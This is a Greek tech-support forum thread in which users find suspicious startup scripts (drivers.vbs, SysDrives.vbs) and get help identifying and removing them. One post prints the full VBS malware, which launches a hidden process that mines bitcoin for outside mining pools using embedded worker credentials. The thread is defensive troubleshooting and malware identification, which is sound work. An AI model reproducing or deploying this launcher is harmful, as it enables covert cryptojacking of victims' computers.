C:\Kernels\drivers.vbs

[RedPanda]

Καλησπέρα,

 

 

Βρήκα στο msconfig πως ξεκινάει ένα "win32.exe" από unknown manufacturer με command "C:\Kernels\drivers.vbs"

 

C:\win32.exe

 

Να ανησυχώ ?

[antonl]

Ε, καλό δεν το κόβω να είναι. Τρέξε κανα antimalware.

[RedPanda]

αν τρέχεις windows 7 (64) κάνε ένα κόπο και δες αν τυχαίνει να έχεις τίποτα τέτοιο (πρέπει να εμφανίσεις system files)

 

τα "συμπτώματα" που αντιμετώπισε ο υπολογιστής μου είναι... παράσιτα ! τα ηχεία μου έκαναν ένα περίεργο θόρυβο σαν παράσιτα.

 

έκανα reboot και απενεργοποίησα μερικά πράγματα από το msconfig και δεν ξέρω αν για τα παράσιτα (που σταμάτησαν) ευθυνόταν το εν λόγο αρχείο

[antonl]

Δεν είμαι σε Win7 αλλά τέτοιο αρχείο δεν υπάρχει ούτε σε Win7. Κάνε ένα scan. Αμφιβάλω λίγο αν προκαλεί όμως παράσιτα το συγκεκριμένο Trojan αλλά μπορεί να κάνω και λάθος.

[RedPanda]

οκ είναι σίγουρα virus ή trojan γιατί φτιάχτηκε χθες που έβαλα πειρατικό το black ops 2 (δέχομαι συγχαρητήρια)

 

αλλά χωρίς πλάκα άνοιξα το pc και είχα παράσιτα σχετικά δυνατά.

 

παίζει να είναι το πιο περίεργο πρόβλημα που έχω δει εδώ και χρόνια !

[micos000]

Προσπάθησε να βρεις το drivers.vbs αρχείο και κάνε δεξί κλικ->επεξεργασία. Μην φοβάσαι, δεν μολύνεσαι έτσι. Το vbs είναι script της vb. Κάνε copy-paste τα περιεχόμενα του σε επόμενο post να δούμε τι ακριβώς κάνει.

Πάντως το win32.exe δεν μου αρέσει και δεν είναι συνηθισμένο να τρέχει κάποιο εκτελέσιμο χύμα από τον C:

[ursutiti]

afto eine sto diko mou -  drivers.vbs

eine sto C:\Kernels/drivers.vbs

 

Const HIDDEN_WINDOW = 12
 
strComputer = "."
Set objWMIService = GetObject("winmgmts:" _
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
 
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("C:/Kernels/driver/explorer.exe -o http://api2.bitcoin.cz:8332 -u noodlies.worker1 -p 12345 -o http://mine.btcguild.com:8332 -u ntoulapboy_1 -p 123 -o http://us2.eclipsemc.com:8337 -u mcntoulapas_slaves -p 123434 -o http://btcmine.com:8332 -u ntoulapas@ntoulapas -p 1234 -I d", null, objConfig, intProcessID)

[Gi0]

Βitcoin miner.

Εχουν γινει πολλοι οι "εξυπνοι" Ελληνες που προσπαθουν να δημιουργησουν bitcoin mining botnets. Με τον πλεον τραγικο τροπο οπως ειναι ξεκαθαρο και απο το "l33t" vbs.

 Ενας αντιστοιχος πριν απο μερικους μηνες ειχε την ατυχια να χρειαστει να καθαρισω τον miner του απο καποια pc. Το οποιο εξελιχθηκε πολυ διαφορετικα απ οτι περιμενε ο ιδιος.

 

@ursutiti

Φανταζομαι τον καθαρισες.

Βtw σε τετοιες περιπτωσεις ειναι πολυ πιθανο να εχουμε χαμηλο ή ακομα και μηδενικο detection rate απο AV, antimalware, κλπ. Περα απο οποιαδηποτε scanning κανετε, ελεγχετε παντα και χειροκινητα.

[micos000]

yparxw22!!! Αυτό θα πει πλεονεξία. Το ss με το usb είναι από το insomnia έτσι; Νομίζω ότι το είδα πρόσφατα.

[Gi0]

yparxw22!!! Αυτό θα πει πλεονεξία. Το ss με το usb είναι από το insomnia έτσι; Νομίζω ότι το είδα πρόσφατα.

Yeap, χρηστης και του insomnia. Προφανως ο συγκεκριμενος λογαριασμος δεν εχει κινηση εδω και καιρο και ειμαι σιγουρος πως δεν θα αποκτησει και ποτέ ξανα. Αυτο δεν σημαινει πως δεν κανει βολτες αναμεσα μας

[tinaaa]

Καλησπέρα

Αντιμετωπίζω κι εγώ κάτι παρόμοιο, το οποίο το ανακάλυψα γιατί κάθε φορά που αντιγράφω κάτι στο usb μου, αυτό γίνεται συντόμευση...

 

Στην εκκίνηση βρήκα αυτό: wscript.exe //B "C:\Users\myuser\AppData\Roaming\SysDrives.vbs" αλλά κανένα antivirus (δοκίμασα αρκετά) δεν βρήκε τίποτα.

 

Αρκεί να απενεργοποιήσω το στοιχείο απ' την εκκίνηση και μετά να διαγράψω το αρχείο??

Ευχαριστώ

[Gi0]

Καλησπέρα

Αντιμετωπίζω κι εγώ κάτι παρόμοιο, το οποίο το ανακάλυψα γιατί κάθε φορά που αντιγράφω κάτι στο usb μου, αυτό γίνεται συντόμευση...

 

Στην εκκίνηση βρήκα αυτό: wscript.exe //B "C:\Users\myuser\AppData\Roaming\SysDrives.vbs" αλλά κανένα antivirus (δοκίμασα αρκετά) δεν βρήκε τίποτα.

 

Αρκεί να απενεργοποιήσω το στοιχείο απ' την εκκίνηση και μετά να διαγράψω το αρχείο??

Ευχαριστώ

 

Πιθανοτατα ναι, αυτη ειναι η λυση.

Πριν το διαγραψεις μπορεις να μου το στειλεις μεσω pm? (βαλτο σε ενα rar και ανεβασε το σε καποιο filesharing site)

[micos000]

Κι εγώ θα ήθελα να το δω. Μπορεί το σκριπτάκι αυτό τρέχει και τίποτα άλλο και να μολύνει και με άλλους τρόπους τον υπολογιστή.

Προτείνω έναν έλεγχο και καθαρισμό με το adwcleaner και το malwarebytes.

[tinaaa]

Οκ!

To malwarebytes το δοκίμασα, αλλά δε βρήκε κάτι. Μόνο το hitmanpro μου βρήκε κάτι ύποπτο στο wscript.exe αλλά έκανε επιδιόρθωση χωρίς να αλλάξει κάτι..

[Gi0]

Θα υπενθυμισω πως εαν καποιο/καποια antivirus/antimalware μας ενημερωνουν πως δεν εντοπισαν κατι, δεν σημαινει πως οντως ειμαστε "καθαροι". Το ιδιο συνεβει και με το malware και την ολη ιστορια το link της οποια δινω στο #8 (συμπεριλαμβανομενου του malwarebytes, του eset και μπολικων ακομα antivirus/antimalware).

To συγκεκριμενο VBS εχει πολυ χαμηλο detection rate (4/50), με το Κaspersky και το Dr Web να το εντοπιζουν.

Οκ!

To malwarebytes το δοκίμασα, αλλά δε βρήκε κάτι. Μόνο το hitmanpro μου βρήκε κάτι ύποπτο στο wscript.exe αλλά έκανε επιδιόρθωση χωρίς να αλλάξει κάτι..

Δοκιμασε το link απο το forum του Avast που σου εδωσα και στο pm.

Στο οποιο ολως τυχαιως Ελληνας εχει και παλι το προβλημα..